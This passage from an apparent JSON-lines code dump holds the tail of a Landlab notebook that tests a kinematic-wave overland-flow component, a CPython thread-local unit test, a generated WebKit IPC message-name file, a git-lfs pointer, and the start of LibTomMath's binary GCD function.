\" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow velocity component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" }\\n\",\n \"\\n\",\n \" def __init__(\\n\",\n \" self,\\n\",\n \" grid,\\n\",\n \" precip_rate=1.0,\\n\",\n \" precip_duration=1.0,\\n\",\n \" infilt_rate=0.0,\\n\",\n \" roughness=0.01,\\n\",\n \" ):\\n\",\n \" \\\"\\\"\\\"Initialize the KinwaveOverlandFlowModel.\\n\",\n \"\\n\",\n \" Parameters\\n\",\n \" ----------\\n\",\n \" grid : ModelGrid\\n\",\n \" Landlab ModelGrid object\\n\",\n \" precip_rate : float, optional (defaults to 1 mm/hr)\\n\",\n \" Precipitation rate, mm/hr\\n\",\n \" precip_duration : float, optional (defaults to 1 hour)\\n\",\n \" Duration of precipitation, hours\\n\",\n \" infilt_rate : float, optional (defaults to 0)\\n\",\n \" Maximum rate of infiltration, mm/hr\\n\",\n \" roughness : float, defaults to 0.01\\n\",\n \" Manning roughness coefficient, s/m^1/3\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" super().__init__(grid)\\n\",\n \"\\n\",\n \" # Store parameters and do unit conversion\\n\",\n \" self._current_time = 0\\n\",\n \"\\n\",\n \" self._precip = precip_rate / 3600000.0 # convert to m/s\\n\",\n \" self._precip_duration = precip_duration * 3600.0 # h->s\\n\",\n \" self._infilt = infilt_rate / 3600000.0 # convert to m/s\\n\",\n \" self._vel_coef = 1.0 / roughness # do division now to save time\\n\",\n \"\\n\",\n \" # Create fields...\\n\",\n \" # Elevation\\n\",\n \" self._elev = grid.at_node[\\\"topographic__elevation\\\"]\\n\",\n \"\\n\",\n \" # Slope\\n\",\n \" self._slope = grid.at_link[\\\"topographic__gradient\\\"]\\n\",\n \"\\n\",\n \" self.initialize_output_fields()\\n\",\n \" self._depth = grid.at_node[\\\"surface_water__depth\\\"]\\n\",\n \" self._vel = grid.at_link[\\\"water__velocity\\\"]\\n\",\n \" self._disch = grid.at_link[\\\"water__specific_discharge\\\"]\\n\",\n \"\\n\",\n \" # Calculate the ground-surface slope (assume it won't change)\\n\",\n \" self._slope[self._grid.active_links] = self._grid.calc_grad_at_link(self._elev)[\\n\",\n \" self._grid.active_links\\n\",\n \" ]\\n\",\n \" self._sqrt_slope = np.sqrt(self._slope)\\n\",\n \" self._sign_slope = np.sign(self._slope)\\n\",\n \"\\n\",\n \" @property\\n\",\n \" def vel_coef(self):\\n\",\n \" \\\"\\\"\\\"Velocity coefficient.\\n\",\n \"\\n\",\n \" (1/roughness)\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" return self._vel_coef\\n\",\n \"\\n\",\n \" def run_one_step(self, dt):\\n\",\n \" \\\"\\\"\\\"Calculate water flow for a time period `dt`.\\n\",\n \"\\n\",\n \" Default units for dt are *seconds*.\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" # Calculate water depth at links. This implements an \\\"upwind\\\" scheme\\n\",\n \" # in which water depth at the links is the depth at the higher of the\\n\",\n \" # two nodes.\\n\",\n \" H_link = self._grid.map_value_at_max_node_to_link(\\n\",\n \" \\\"topographic__elevation\\\", \\\"surface_water__depth\\\"\\n\",\n \" )\\n\",\n \"\\n\",\n \" # Calculate velocity using the Manning equation.\\n\",\n \" self._vel = (\\n\",\n \" -self._sign_slope * self._vel_coef * H_link ** 0.66667 * self._sqrt_slope\\n\",\n \" )\\n\",\n \"\\n\",\n \" # Calculate discharge\\n\",\n \" self._disch[:] = H_link * self._vel\\n\",\n \"\\n\",\n \" # Flux divergence\\n\",\n \" dqda = self._grid.calc_flux_div_at_node(self._disch)\\n\",\n \"\\n\",\n \" # Rate of change of water depth\\n\",\n \" if self._current_time < self._precip_duration:\\n\",\n \" ppt = self._precip\\n\",\n \" else:\\n\",\n \" ppt = 0.0\\n\",\n \" dHdt = ppt - self._infilt - dqda\\n\",\n \"\\n\",\n \" # Update water depth: simple forward Euler scheme\\n\",\n \" self._depth[self._grid.core_nodes] += dHdt[self._grid.core_nodes] * dt\\n\",\n \"\\n\",\n \" # Very crude numerical hack: prevent negative water depth\\n\",\n \" self._depth[np.where(self._depth < 0.0)[0]] = 0.0\\n\",\n \"\\n\",\n \" self._current_time += dt\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"from landlab import RasterModelGrid\\n\",\n \"\\n\",\n \"nr = 3\\n\",\n \"nc = 4\\n\",\n \"rg = RasterModelGrid((nr, nc), 10.0)\\n\",\n \"rg.add_empty(\\\"topographic__elevation\\\", at=\\\"node\\\")\\n\",\n \"rg.add_zeros(\\\"topographic__gradient\\\", at=\\\"link\\\")\\n\",\n \"rg.at_node[\\\"topographic__elevation\\\"][:] = rg.x_of_node.copy()\\n\",\n \"kinflow = KinwaveOverlandFlowModel(rg, precip_rate=100.0, precip_duration=100.0)\\n\",\n \"\\n\",\n \"for i in range(100):\\n\",\n \" kinflow.run_one_step(1.0)\\n\",\n \"print(\\\"The discharge from node 6 to node 5 should be -0.000278 m2/s:\\\")\\n\",\n \"print(rg.at_link[\\\"water__specific_discharge\\\"][8])\\n\",\n \"print(\\\"The discharge from node 5 to node 4 should be -0.000556 m2/s:\\\")\\n\",\n \"print(rg.at_link[\\\"water__specific_discharge\\\"][7])\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"Next, we'll test the component on a larger grid and a larger domain.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"nr = 62\\n\",\n \"nc = 42\\n\",\n \"rg = RasterModelGrid((nr, nc), 10.0)\\n\",\n \"rg.add_empty(\\\"topographic__elevation\\\", at=\\\"node\\\")\\n\",\n \"rg.at_node[\\\"topographic__elevation\\\"] = 0.01 * rg.y_of_node\\n\",\n \"rg.add_zeros(\\\"topographic__gradient\\\", at=\\\"link\\\")\\n\",\n \"kinflow = KinwaveOverlandFlowModel(rg, precip_rate=100.0, precip_duration=100.0)\\n\",\n \"for i in range(1800):\\n\",\n \" kinflow.run_one_step(1.0)\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"Plot the topography:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"%matplotlib inline\\n\",\n \"from landlab.plot import imshow_grid\\n\",\n \"\\n\",\n \"imshow_grid(rg, \\\"topographic__elevation\\\")\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"The steady solution should be as follows. The unit discharge at the bottom edge should equal the precipitation rate, 100 mm/hr, times the slope length.\\n\",\n \"\\n\",\n \"The slope length is the distance from the bottom edge of the bottom-most row of cells, to the top edge of the top-most row of cells. The base row of nodes are at y = 0, and the cell edges start half a cell width up from that, so y = 5 m. The top of the upper-most row of cells is half a cell width below the top grid edge, which is 610 m, so the top of the cells is 605 m. Hence the interior (cell) portion of the grid is 600 m long.\\n\",\n \"\\n\",\n \"Hence, discharge out the bottom should be 100 mm/hr x 600 m = 0.1 m/hr x 600 m = 60 m2/hr. Let's convert this to m2/s:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"q_out = 0.1 * 600 / 3600.0\\n\",\n \"q_out\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"The water depth should be just sufficient to carry this discharge with the given slope and roughness. We get this by inverting the Manning equation:\\n\",\n \"\\n\",\n \"$$q = (1/n) H^{5/3} S^{1/2}$$\\n\",\n \"\\n\",\n \"$$H^{5/3} = n q S^{-1/2}$$\\n\",\n \"\\n\",\n \"$$H = (n q)^{3/5} S^{-3/10}$$\\n\",\n \"\\n\",\n \"The slope gradient is 0.01 (because we set elevation to be 0.01 times the y coordinate). The discharge, as we've already established, is about 0.0167 m2/s, and the roughness is 0.01 (the default value). Therefore,\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"n = 0.01\\n\",\n \"q = 0.0167\\n\",\n \"S = 0.01\\n\",\n \"H_out = (n * q) ** 0.6 * S ** -0.3\\n\",\n \"H_out\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"imshow_grid(rg, \\\"surface_water__depth\\\", cmap=\\\"Blues\\\")\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"This looks pretty good. Let's check the values:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"rg.at_node[\\\"surface_water__depth\\\"][42:84] # bottom row of core nodes\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"We see that the depth agrees with the analytical solution to within three decimal places: not bad. Ideally, we would build the above tests into the component as doctests or unit tests. We could also test the transient solutions: rising hydrograph, falling hydrograph. Finally, we haven't tested all the ingredients; for example, we haven't tested what happens when infiltration rate is greater than zero.\\n\",\n \"\\n\",\n \"Nonetheless, the above example illustrates the basics of component-making. A great next step would be to create a unit test based on this example.\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Click here for more [Landlab tutorials](https://landlab.readthedocs.io/en/latest/user_guide/tutorials.html)\"\n ]\n }\n ],\n \"metadata\": {\n \"kernelspec\": {\n \"display_name\": \"Python 3\",\n \"language\": \"python\",\n \"name\": \"python3\"\n },\n \"language_info\": {\n \"codemirror_mode\": {\n \"name\": \"ipython\",\n \"version\": 3\n },\n \"file_extension\": \".py\",\n \"mimetype\": \"text/x-python\",\n \"name\": \"python\",\n \"nbconvert_exporter\": \"python\",\n \"pygments_lexer\": \"ipython3\",\n \"version\": \"3.8.1\"\n }\n },\n \"nbformat\": 4,\n \"nbformat_minor\": 1\n}\n"} {"text": "import unittest\nfrom doctest import DocTestSuite\nfrom test import support\nimport weakref\nimport gc\n\n# Modules under test\n_thread = support.import_module('_thread')\nthreading = support.import_module('threading')\nimport _threading_local\n\n\nclass Weak(object):\n pass\n\ndef target(local, weaklist):\n weak = Weak()\n local.weak = weak\n weaklist.append(weakref.ref(weak))\n\n\nclass BaseLocalTest:\n\n def test_local_refs(self):\n self._local_refs(20)\n self._local_refs(50)\n self._local_refs(100)\n\n def _local_refs(self, n):\n local = self._local()\n weaklist = []\n for i in range(n):\n t = threading.Thread(target=target, args=(local, weaklist))\n t.start()\n t.join()\n del t\n\n gc.collect()\n self.assertEqual(len(weaklist), n)\n\n # XXX _threading_local keeps the local of the last stopped thread alive.\n deadlist = [weak for weak in weaklist if weak() is None]\n self.assertIn(len(deadlist), (n-1, n))\n\n # Assignment to the same thread local frees it sometimes (!)\n local.someothervar = None\n gc.collect()\n deadlist = [weak for weak in weaklist if weak() is None]\n self.assertIn(len(deadlist), (n-1, n), (n, len(deadlist)))\n\n def test_derived(self):\n # Issue 3088: if there is a threads switch inside the __init__\n # of a threading.local derived class, the per-thread dictionary\n # is created but not correctly set on the object.\n # The first member set may be bogus.\n import time\n class Local(self._local):\n def __init__(self):\n time.sleep(0.01)\n local = Local()\n\n def f(i):\n local.x = i\n # Simply check that the variable is correctly set\n self.assertEqual(local.x, i)\n\n with support.start_threads(threading.Thread(target=f, args=(i,))\n for i in range(10)):\n pass\n\n def test_derived_cycle_dealloc(self):\n # http://bugs.python.org/issue6990\n class Local(self._local):\n pass\n locals = None\n passed = False\n e1 = threading.Event()\n e2 = threading.Event()\n\n def f():\n nonlocal passed\n # 1) Involve Local in a cycle\n cycle = [Local()]\n cycle.append(cycle)\n cycle[0].foo = 'bar'\n\n # 2) GC the cycle (triggers threadmodule.c::local_clear\n # before local_dealloc)\n del cycle\n gc.collect()\n e1.set()\n e2.wait()\n\n # 4) New Locals should be empty\n passed = all(not hasattr(local, 'foo') for local in locals)\n\n t = threading.Thread(target=f)\n t.start()\n e1.wait()\n\n # 3) New Locals should recycle the original's address. Creating\n # them in the thread overwrites the thread state and avoids the\n # bug\n locals = [Local() for i in range(10)]\n e2.set()\n t.join()\n\n self.assertTrue(passed)\n\n def test_arguments(self):\n # Issue 1522237\n class MyLocal(self._local):\n def __init__(self, *args, **kwargs):\n pass\n\n MyLocal(a=1)\n MyLocal(1)\n self.assertRaises(TypeError, self._local, a=1)\n self.assertRaises(TypeError, self._local, 1)\n\n def _test_one_class(self, c):\n self._failed = \"No error message set or cleared.\"\n obj = c()\n e1 = threading.Event()\n e2 = threading.Event()\n\n def f1():\n obj.x = 'foo'\n obj.y = 'bar'\n del obj.y\n e1.set()\n e2.wait()\n\n def f2():\n try:\n foo = obj.x\n except AttributeError:\n # This is expected -- we haven't set obj.x in this thread yet!\n self._failed = \"\" # passed\n else:\n self._failed = ('Incorrectly got value %r from class %r\\n' %\n (foo, c))\n sys.stderr.write(self._failed)\n\n t1 = threading.Thread(target=f1)\n t1.start()\n e1.wait()\n t2 = threading.Thread(target=f2)\n t2.start()\n t2.join()\n # The test is done; just let t1 know it can exit, and wait for it.\n e2.set()\n t1.join()\n\n self.assertFalse(self._failed, self._failed)\n\n def test_threading_local(self):\n self._test_one_class(self._local)\n\n def test_threading_local_subclass(self):\n class LocalSubclass(self._local):\n \"\"\"To test that subclasses behave properly.\"\"\"\n self._test_one_class(LocalSubclass)\n\n def _test_dict_attribute(self, cls):\n obj = cls()\n obj.x = 5\n self.assertEqual(obj.__dict__, {'x': 5})\n with self.assertRaises(AttributeError):\n obj.__dict__ = {}\n with self.assertRaises(AttributeError):\n del obj.__dict__\n\n def test_dict_attribute(self):\n self._test_dict_attribute(self._local)\n\n def test_dict_attribute_subclass(self):\n class LocalSubclass(self._local):\n \"\"\"To test that subclasses behave properly.\"\"\"\n self._test_dict_attribute(LocalSubclass)\n\n def test_cycle_collection(self):\n class X:\n pass\n\n x = X()\n x.local = self._local()\n x.local.x = x\n wr = weakref.ref(x)\n del x\n gc.collect()\n self.assertIs(wr(), None)\n\n\nclass ThreadLocalTest(unittest.TestCase, BaseLocalTest):\n _local = _thread._local\n\nclass PyThreadingLocalTest(unittest.TestCase, BaseLocalTest):\n _local = _threading_local.local\n\n\ndef test_main():\n suite = unittest.TestSuite()\n suite.addTest(DocTestSuite('_threading_local'))\n suite.addTest(unittest.makeSuite(ThreadLocalTest))\n suite.addTest(unittest.makeSuite(PyThreadingLocalTest))\n\n local_orig = _threading_local.local\n def setUp(test):\n _threading_local.local = _thread._local\n def tearDown(test):\n _threading_local.local = local_orig\n suite.addTest(DocTestSuite('_threading_local',\n setUp=setUp, tearDown=tearDown)\n )\n\n support.run_unittest(suite)\n\nif __name__ == '__main__':\n test_main()\n"} {"text": "/*\n * Copyright (C) 2010-2020 Apple Inc. All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n * DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR\n * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n#include \"config.h\"\n#include \"MessageNames.h\"\n\nnamespace IPC {\n\nconst char* description(MessageName name)\n{\n switch (name) {\n case MessageName::WebPage_AddEvent:\n return \"WebPage_AddEvent\";\n case MessageName::WebPage_Close:\n return \"WebPage_Close\";\n case MessageName::WebPage_CreatePlugin:\n return \"WebPage_CreatePlugin\";\n case MessageName::WebPage_DeprecatedOperation:\n return \"WebPage_DeprecatedOperation\";\n case MessageName::WebPage_DidCreateWebProcessConnection:\n return \"WebPage_DidCreateWebProcessConnection\";\n case MessageName::WebPage_DidReceivePolicyDecision:\n return \"WebPage_DidReceivePolicyDecision\";\n case MessageName::WebPage_ExperimentalOperation:\n return \"WebPage_ExperimentalOperation\";\n case MessageName::WebPage_GetPluginProcessConnection:\n return \"WebPage_GetPluginProcessConnection\";\n case MessageName::WebPage_GetPlugins:\n return \"WebPage_GetPlugins\";\n case MessageName::WebPage_InterpretKeyEvent:\n return \"WebPage_InterpretKeyEvent\";\n case MessageName::WebPage_LoadSomething:\n return \"WebPage_LoadSomething\";\n case MessageName::WebPage_LoadSomethingElse:\n return \"WebPage_LoadSomethingElse\";\n case MessageName::WebPage_LoadURL:\n return \"WebPage_LoadURL\";\n case MessageName::WebPage_PreferencesDidChange:\n return \"WebPage_PreferencesDidChange\";\n case MessageName::WebPage_RunJavaScriptAlert:\n return \"WebPage_RunJavaScriptAlert\";\n case MessageName::WebPage_SendDoubleAndFloat:\n return \"WebPage_SendDoubleAndFloat\";\n case MessageName::WebPage_SendInts:\n return \"WebPage_SendInts\";\n case MessageName::WebPage_SetVideoLayerID:\n return \"WebPage_SetVideoLayerID\";\n case MessageName::WebPage_TemplateTest:\n return \"WebPage_TemplateTest\";\n case MessageName::WebPage_TestAsyncMessage:\n return \"WebPage_TestAsyncMessage\";\n case MessageName::WebPage_TestAsyncMessageReply:\n return \"WebPage_TestAsyncMessageReply\";\n case MessageName::WebPage_TestAsyncMessageWithConnection:\n return \"WebPage_TestAsyncMessageWithConnection\";\n case MessageName::WebPage_TestAsyncMessageWithConnectionReply:\n return \"WebPage_TestAsyncMessageWithConnectionReply\";\n case MessageName::WebPage_TestAsyncMessageWithMultipleArguments:\n return \"WebPage_TestAsyncMessageWithMultipleArguments\";\n case MessageName::WebPage_TestAsyncMessageWithMultipleArgumentsReply:\n return \"WebPage_TestAsyncMessageWithMultipleArgumentsReply\";\n case MessageName::WebPage_TestAsyncMessageWithNoArguments:\n return \"WebPage_TestAsyncMessageWithNoArguments\";\n case MessageName::WebPage_TestAsyncMessageWithNoArgumentsReply:\n return \"WebPage_TestAsyncMessageWithNoArgumentsReply\";\n case MessageName::WebPage_TestMultipleAttributes:\n return \"WebPage_TestMultipleAttributes\";\n case MessageName::WebPage_TestParameterAttributes:\n return \"WebPage_TestParameterAttributes\";\n case MessageName::WebPage_TestSyncMessage:\n return \"WebPage_TestSyncMessage\";\n case MessageName::WebPage_TestSynchronousMessage:\n return \"WebPage_TestSynchronousMessage\";\n case MessageName::WebPage_TouchEvent:\n return \"WebPage_TouchEvent\";\n case MessageName::WrappedAsyncMessageForTesting:\n return \"IPC::WrappedAsyncMessageForTesting\";\n case MessageName::SyncMessageReply:\n return \"IPC::SyncMessageReply\";\n case MessageName::InitializeConnection:\n return \"IPC::InitializeConnection\";\n case MessageName::LegacySessionState:\n return \"IPC::LegacySessionState\";\n }\n ASSERT_NOT_REACHED();\n return \"\";\n}\n\nReceiverName receiverName(MessageName messageName)\n{\n switch (messageName) {\n case MessageName::WebPage_AddEvent:\n case MessageName::WebPage_Close:\n case MessageName::WebPage_CreatePlugin:\n case MessageName::WebPage_DeprecatedOperation:\n case MessageName::WebPage_DidCreateWebProcessConnection:\n case MessageName::WebPage_DidReceivePolicyDecision:\n case MessageName::WebPage_ExperimentalOperation:\n case MessageName::WebPage_GetPluginProcessConnection:\n case MessageName::WebPage_GetPlugins:\n case MessageName::WebPage_InterpretKeyEvent:\n case MessageName::WebPage_LoadSomething:\n case MessageName::WebPage_LoadSomethingElse:\n case MessageName::WebPage_LoadURL:\n case MessageName::WebPage_PreferencesDidChange:\n case MessageName::WebPage_RunJavaScriptAlert:\n case MessageName::WebPage_SendDoubleAndFloat:\n case MessageName::WebPage_SendInts:\n case MessageName::WebPage_SetVideoLayerID:\n case MessageName::WebPage_TemplateTest:\n case MessageName::WebPage_TestMultipleAttributes:\n case MessageName::WebPage_TestParameterAttributes:\n case MessageName::WebPage_TouchEvent:\n return ReceiverName::WebPage;\n case MessageName::WebPage_TestAsyncMessageReply:\n case MessageName::WebPage_TestAsyncMessageWithConnectionReply:\n case MessageName::WebPage_TestAsyncMessageWithMultipleArgumentsReply:\n case MessageName::WebPage_TestAsyncMessageWithNoArgumentsReply:\n return ReceiverName::AsyncReply;\n case MessageName::WrappedAsyncMessageForTesting:\n case MessageName::SyncMessageReply:\n case MessageName::InitializeConnection:\n case MessageName::LegacySessionState:\n return ReceiverName::IPC;\n }\n ASSERT_NOT_REACHED();\n return ReceiverName::Invalid;\n}\n\nbool isValidMessageName(MessageName messageName)\n{\n if (messageName == IPC::MessageName::WebPage_LoadURL)\n return true;\n#if ENABLE(TEST_FEATURE)\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessage)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageReply)\n return true;\n#endif\n#if ENABLE(TEST_FEATURE)\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithNoArguments)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithNoArgumentsReply)\n return true;\n#endif\n#if ENABLE(TEST_FEATURE)\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithMultipleArguments)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithMultipleArgumentsReply)\n return true;\n#endif\n#if ENABLE(TEST_FEATURE)\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithConnection)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestAsyncMessageWithConnectionReply)\n return true;\n#endif\n if (messageName == IPC::MessageName::WebPage_TestSyncMessage)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestSynchronousMessage)\n return true;\n if (messageName == IPC::MessageName::WebPage_LoadURL)\n return true;\n#if ENABLE(TOUCH_EVENTS)\n if (messageName == IPC::MessageName::WebPage_LoadSomething)\n return true;\n#endif\n#if (ENABLE(TOUCH_EVENTS) && (NESTED_MESSAGE_CONDITION || SOME_OTHER_MESSAGE_CONDITION))\n if (messageName == IPC::MessageName::WebPage_TouchEvent)\n return true;\n#endif\n#if (ENABLE(TOUCH_EVENTS) && (NESTED_MESSAGE_CONDITION && SOME_OTHER_MESSAGE_CONDITION))\n if (messageName == IPC::MessageName::WebPage_AddEvent)\n return true;\n#endif\n#if ENABLE(TOUCH_EVENTS)\n if (messageName == IPC::MessageName::WebPage_LoadSomethingElse)\n return true;\n#endif\n if (messageName == IPC::MessageName::WebPage_DidReceivePolicyDecision)\n return true;\n if (messageName == IPC::MessageName::WebPage_Close)\n return true;\n if (messageName == IPC::MessageName::WebPage_PreferencesDidChange)\n return true;\n if (messageName == IPC::MessageName::WebPage_SendDoubleAndFloat)\n return true;\n if (messageName == IPC::MessageName::WebPage_SendInts)\n return true;\n if (messageName == IPC::MessageName::WebPage_CreatePlugin)\n return true;\n if (messageName == IPC::MessageName::WebPage_RunJavaScriptAlert)\n return true;\n if (messageName == IPC::MessageName::WebPage_GetPlugins)\n return true;\n if (messageName == IPC::MessageName::WebPage_GetPluginProcessConnection)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestMultipleAttributes)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestParameterAttributes)\n return true;\n if (messageName == IPC::MessageName::WebPage_TemplateTest)\n return true;\n if (messageName == IPC::MessageName::WebPage_SetVideoLayerID)\n return true;\n#if PLATFORM(MAC)\n if (messageName == IPC::MessageName::WebPage_DidCreateWebProcessConnection)\n return true;\n#endif\n#if PLATFORM(MAC)\n if (messageName == IPC::MessageName::WebPage_InterpretKeyEvent)\n return true;\n#endif\n#if ENABLE(DEPRECATED_FEATURE)\n if (messageName == IPC::MessageName::WebPage_DeprecatedOperation)\n return true;\n#endif\n#if ENABLE(EXPERIMENTAL_FEATURE)\n if (messageName == IPC::MessageName::WebPage_ExperimentalOperation)\n return true;\n#endif\n if (messageName == IPC::MessageName::WebPage_LoadURL)\n return true;\n#if ENABLE(TOUCH_EVENTS)\n if (messageName == IPC::MessageName::WebPage_LoadSomething)\n return true;\n#endif\n#if (ENABLE(TOUCH_EVENTS) && (NESTED_MESSAGE_CONDITION || SOME_OTHER_MESSAGE_CONDITION))\n if (messageName == IPC::MessageName::WebPage_TouchEvent)\n return true;\n#endif\n#if (ENABLE(TOUCH_EVENTS) && (NESTED_MESSAGE_CONDITION && SOME_OTHER_MESSAGE_CONDITION))\n if (messageName == IPC::MessageName::WebPage_AddEvent)\n return true;\n#endif\n#if ENABLE(TOUCH_EVENTS)\n if (messageName == IPC::MessageName::WebPage_LoadSomethingElse)\n return true;\n#endif\n if (messageName == IPC::MessageName::WebPage_DidReceivePolicyDecision)\n return true;\n if (messageName == IPC::MessageName::WebPage_Close)\n return true;\n if (messageName == IPC::MessageName::WebPage_PreferencesDidChange)\n return true;\n if (messageName == IPC::MessageName::WebPage_SendDoubleAndFloat)\n return true;\n if (messageName == IPC::MessageName::WebPage_SendInts)\n return true;\n if (messageName == IPC::MessageName::WebPage_CreatePlugin)\n return true;\n if (messageName == IPC::MessageName::WebPage_RunJavaScriptAlert)\n return true;\n if (messageName == IPC::MessageName::WebPage_GetPlugins)\n return true;\n if (messageName == IPC::MessageName::WebPage_GetPluginProcessConnection)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestMultipleAttributes)\n return true;\n if (messageName == IPC::MessageName::WebPage_TestParameterAttributes)\n return true;\n if (messageName == IPC::MessageName::WebPage_TemplateTest)\n return true;\n if (messageName == IPC::MessageName::WebPage_SetVideoLayerID)\n return true;\n#if PLATFORM(MAC)\n if (messageName == IPC::MessageName::WebPage_DidCreateWebProcessConnection)\n return true;\n#endif\n#if PLATFORM(MAC)\n if (messageName == IPC::MessageName::WebPage_InterpretKeyEvent)\n return true;\n#endif\n#if ENABLE(DEPRECATED_FEATURE)\n if (messageName == IPC::MessageName::WebPage_DeprecatedOperation)\n return true;\n#endif\n#if ENABLE(EXPERIMENTAL_FEATURE)\n if (messageName == IPC::MessageName::WebPage_ExperimentalOperation)\n return true;\n#endif\n if (messageName == IPC::MessageName::WrappedAsyncMessageForTesting)\n return true;\n if (messageName == IPC::MessageName::SyncMessageReply)\n return true;\n if (messageName == IPC::MessageName::InitializeConnection)\n return true;\n if (messageName == IPC::MessageName::LegacySessionState)\n return true;\n return false;\n};\n\n} // namespace IPC\n"} {"text": "version https://git-lfs.github.com/spec/v1\noid sha256:51b316ed411dd2664185e042b3c6e100ddf32830eee4401923b575960522a82a\nsize 19419\n"} {"text": "#include \"tommath_private.h\"\n#ifdef BN_MP_GCD_C\n/* LibTomMath, multiple-precision integer library -- Tom St Denis */\n/* SPDX-License-Identifier: Unlicense */\n\n/* Greatest Common Divisor using the binary method */\nmp_err mp_gcd(const mp_int *a, const mp_int *b, mp_int *c)\n{\n mp_int u, v;\n int k, u_lsb, v_lsb;\n mp_err err;\n\n /* either zero than gcd is the largest */\n if (MP_IS_ZERO(a)) {\n return mp_abs(b, c);\n }\n if (MP_IS_ZERO(b)) {\n return mp_abs(a, c);\n }\n\n /* get copies of a and b we can modify */\n if ((err = mp_init_copy(&u, a)) != MP_OKAY) {\n return err;\n }\n\n if ((err = mp_init_copy(&v, b)) != MP_OKAY) {\n goto LBL_U;\n }\n\n /* must be positive for the remainder of the algorithm */\n u.sign = v.sign = MP_ZPOS;\n\n /* B1. Find the common power of two for u and v */\n u_lsb = mp_cnt_lsb(&u);\n v_lsb = mp_cnt_lsb(&v);\n k = MP_MIN(u_lsb, v_lsb);\n\n if (k > 0) {\n /* divide the power of two out */\n if ((err = mp_div_2d(&u, k, &u, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n\n if ((err = mp_div_2d(&v, k, &v, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n }\n\n /* divide any remaining factors of two out */\n if (u_lsb != k) {\n if ((err = mp_div_2d(&u, u_lsb - k, &u, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n }\n\n if (v_lsb != k) {\n if ((err = mp_div_2d(&v, v_lsb - k, &v, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n }\n\n while (!MP_IS_ZERO(&v)) {\n /* make sure v is the largest */\n if (mp_cmp_mag(&u, &v) == MP_GT) {\n /* swap u and v to make sure v is >= u */\n mp_exch(&u, &v);\n }\n\n /* subtract smallest from largest */\n if ((err = s_mp_sub(&v, &u, &v)) != MP_OKAY) {\n goto LBL_V;\n }\n\n /* Divide out all factors of two */\n if ((err = mp_div_2d(&v, mp_cnt_lsb(&v), &v, NULL)) != MP_OKAY) {\n goto LBL_V;\n }\n }\n\n /* multiply by 2**k which we divided out at the 